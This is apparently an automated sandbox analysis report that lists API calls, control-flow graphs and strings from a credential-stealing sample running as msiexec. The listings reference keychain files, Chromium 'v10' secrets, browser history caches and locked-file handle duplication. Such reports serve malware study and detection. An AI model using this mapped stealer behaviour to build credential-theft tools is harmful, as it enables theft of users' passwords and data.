                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                • memset.MSVCRT ref: 00445986
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                • API String ID: 2263259095-3798722523
                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                • API String ID: 2744995895-28296030
                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                • memset.MSVCRT ref: 0040B756
                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                • memset.MSVCRT ref: 0040B851
                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                • String ID: chp$v10
                                                                                • API String ID: 4290143792-2783969131
                                                                                • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • free.MSVCRT ref: 0040E49A
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                • memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E407
                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E422
                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E43D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                • API String ID: 3849927982-2252543386
                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004091E2
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                • String ID:
                                                                                • API String ID: 3715365532-3916222277
                                                                                • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                • String ID: bhv
                                                                                • API String ID: 4234240956-2689659898
                                                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2941347001-70141382
                                                                                • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                • String ID:
                                                                                • API String ID: 2827331108-0
                                                                                • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                • String ID: visited:
                                                                                • API String ID: 1157525455-1702587658
                                                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                                                APIs
                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                • memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                • free.MSVCRT ref: 0040E28B
                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                • _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                • API String ID: 2804212203-2982631422
                                                                                • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 115830560-3916222277
                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
